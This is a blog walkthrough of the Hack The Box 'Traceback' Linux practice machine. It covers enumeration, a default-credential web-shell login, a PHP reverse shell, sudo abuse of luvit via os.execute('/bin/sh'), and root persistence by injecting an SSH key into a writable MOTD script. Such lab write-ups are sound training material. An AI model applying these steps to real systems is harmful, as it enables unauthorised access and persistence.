hack the box walkthrough – Traceback machine
Here we go again today with a new HTB walkthrough – an easy linux machine: Traceback!
Let’s jump it!
Enumeration
Our nmap (via nmapAutomator) gave me the following output:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.1.189 Full
Running a Full scan on 10.129.1.189
Host is likely running Linux
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 08:39 EST
Initiating Parallel DNS resolution of 1 host. at 08:39
Completed Parallel DNS resolution of 1 host. at 08:39, 0.01s elapsed
Initiating Connect Scan at 08:39
Scanning 10.129.1.189 [65535 ports]
Discovered open port 80/tcp on 10.129.1.189
Discovered open port 22/tcp on 10.129.1.189
Warning: 10.129.1.189 giving up on port because retransmission cap hit (1).
Connect Scan Timing: About 22.93% done; ETC: 08:41 (0:01:44 remaining)
Connect Scan Timing: About 44.95% done; ETC: 08:41 (0:01:15 remaining)
Connect Scan Timing: About 67.50% done; ETC: 08:41 (0:00:44 remaining)
Completed Connect Scan at 08:41, 136.79s elapsed (65535 total ports)
Nmap scan report for 10.129.1.189
Host is up (0.025s latency).
Not shown: 64757 closed ports, 776 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.88 seconds
Making a script scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 08:41 EST
Nmap scan report for 10.129.1.189
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds
---------------------Finished all Nmap scans---------------------
Completed in 2 minute(s) and 25 second(s)
On port 80 I had the following weird web page:
The code source of this page showed a hint:
<!--Some of the best web shells that you might need ;)-->With a quick OSINT search I found the following github with a list of webshell : https://github.com/TheBinitGhimire/Web-Shells
I had to test all web shell listed one by one and found that smevk.php is existing:
The smevk default credentials let me in (admin/admin)
Foothold
I could upload the php-reverse-shell.php included in Kali Linux in /usr/share/webshells/php/ to get my reverse shell
Don’t forget to edit the variable with your IP address and your listening port:
[email protected]:/home/webadmin$ whoami && id
webadmin
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)I am in!
Lateral Movement
Looking in the home folder, I found a file note.txt containing the following:
[email protected]:/home/webadmin$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
[email protected]:/home/webadmin$ Looking at sudo -l, I got the following output:
[email protected]:/home/webadmin$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
[email protected]:/home/webadmin$ the goal is to spawn the shell with sysadmin permission. I have create a lua file with the following content:
[email protected]:/home/webadmin$ cat privesc.lua
os.execute("/bin/sh")Then the following command to reach my goal:
[email protected]:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
$ whoami && id
sysadmin
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$ Privilege Escalation
A linpeas scan showed me a potential escalation vector here:
update-motd.d is the folder which contains the script which generate the Messge Of The Day when you connect via SSH for example.
And it seems I have write permission. So I can use it to add my SSH public key into the root’s authorized_keys file
First at all I need sysadmin’s SSH access:
[email protected]:~/Documents$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:fHyPIzh7o1WdlFcPmJav3hY8X56oFttw+m3e11GgC5E [email protected]
The key's randomart image is:
+---[RSA 3072]----+
| . +. .|
| E = .oo|
| o oo.o|
| . .. .o.o.|
| S o.o+o .|
| o =o++..|
| o o.X.o==|
| +o=.++o*|
| oo.oooooo|
+----[SHA256]-----+
[email protected]:~/Documents$ cat /home/kali/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXM3x2sl3A/kyQoBJsbMV7R4qSZwcMrXdDpwkyb3jSTCfSvJbNlo+/WCgF8z5oYyTWIShKNXjJqs9PEbdk42Qob0HtYaXtDvcpC3OAqm57/5iT31GvV0+uAQanaxYFGK6QMw4Gti2Oxf5QAZjA/C5LIH8Ivq4+VJuy1gbUoiYZjR+VQi+akjnmPc+XiC6bYFNVef2w3yDTC5urfJuHwqXZiP0EzChtYZHqT5/3/s+3/Bs5EGfEgVdkMkna3U9sAyjBXOOJ82l2/PQzWEML32B+pI7AbUIeI+Q/uUxR8WgnBo96GwEe1Uihi/yPd0H33gBxXovhYh9qsJOA22SGDJfyLthlZJ3S8AVLbGdWtV80ckD18QGZzS+zBhuUjK2w1bQAclV3Gz1MubEjWDFjn4bgADw/qvzucvO7Fgt532D4jW3J35TBb6G//PsK8kuUcqB15aIRvAWhB4bKLqx+USJKw3rGQPC1hDO5178UaZsfAE6c1Qc5v1AuuwGNEmijvdU= [email protected]I add our public key to sysadmin’s authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXM3x2sl3A/kyQoBJsbMV7R4qSZwcMrXdDpwkyb3jSTCfSvJbNlo+/WCgF8z5oYyTWIShKNXjJqs9PEbdk42Qob0HtYaXtDvcpC3OAqm57/5iT31GvV0+uAQanaxYFGK6QMw4Gti2Oxf5QAZjA/C5LIH8Ivq4+VJuy1gbUoiYZjR+VQi+akjnmPc+XiC6bYFNVef2w3yDTC5urfJuHwqXZiP0EzChtYZHqT5/3/s+3/Bs5EGfEgVdkMkna3U9sAyjBXOOJ82l2/PQzWEML32B+pI7AbUIeI+Q/uUxR8WgnBo96GwEe1Uihi/yPd0H33gBxXovhYh9qsJOA22SGDJfyLthlZJ3S8AVLbGdWtV80ckD18QGZzS+zBhuUjK2w1bQAclV3Gz1MubEjWDFjn4bgADw/qvzucvO7Fgt532D4jW3J35TBb6G//PsK8kuUcqB15aIRvAWhB4bKLqx+USJKw3rGQPC1hDO5178UaZsfAE6c1Qc5v1AuuwGNEmijvdU= [email protected]" >> /home/sysadmin/.ssh/authorized_keysI test our connection:
[email protected]:~/Documents$ ssh -i /home/kali/.ssh/id_rsa [email protected]
The authenticity of host '10.129.1.189 (10.129.1.189)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.1.189' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Welcome to Xh4H land
Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2Looks fine. Then now I edit the 00-header file as following:
cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"
echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXM3x2sl3A/kyQoBJsbMV7R4qSZwcMrXdDpwkyb3jSTCfSvJbNlo+/WCgF8z5oYyTWIShKNXjJqs9PEbdk42Qob0HtYaXtDvcpC3OAqm57/5iT31GvV0+uAQanaxYFGK6QMw4Gti2Oxf5QAZjA/C5LIH8Ivq4+VJuy1gbUoiYZjR+VQi+akjnmPc+XiC6bYFNVef2w3yDTC5urfJuHwqXZiP0EzChtYZHqT5/3/s+3/Bs5EGfEgVdkMkna3U9sAyjBXOOJ82l2/PQzWEML32B+pI7AbUIeI+Q/uUxR8WgnBo96GwEe1Uihi/yPd0H33gBxXovhYh9qsJOA22SGDJfyLthlZJ3S8AVLbGdWtV80ckD18QGZzS+zBhuUjK2w1bQAclV3Gz1MubEjWDFjn4bgADw/qvzucvO7Fgt532D4jW3J35TBb6G//PsK8kuUcqB15aIRvAWhB4bKLqx+USJKw3rGQPC1hDO5178UaZsfAE6c1Qc5v1AuuwGNEmijvdU= [email protected] >> /root/.ssh/authorized_keys
I connect first to sysadmin SSH then with root.
[email protected]:~/.ssh$ ssh -i id_rsa [email protected]
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key 'id_rsa':
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jan 30 08:10:49 2021 from 10.10.14.40
$ exit
Connection to 10.129.1.189 closed.
[email protected]:~/.ssh$ ssh -i id_rsa [email protected]
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key 'id_rsa':
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jan 24 03:43:29 2020
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)And I am root ! Looks like my public ssh key has been correctly copied to root’s authorized_keys
EXTRA
Looking at the official HTB write up I learnt that I could use pspy (https://github.com/DominicBreuker/pspy) and found out that a process was running every 30 seconds to copy the motd script from a backup:
/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
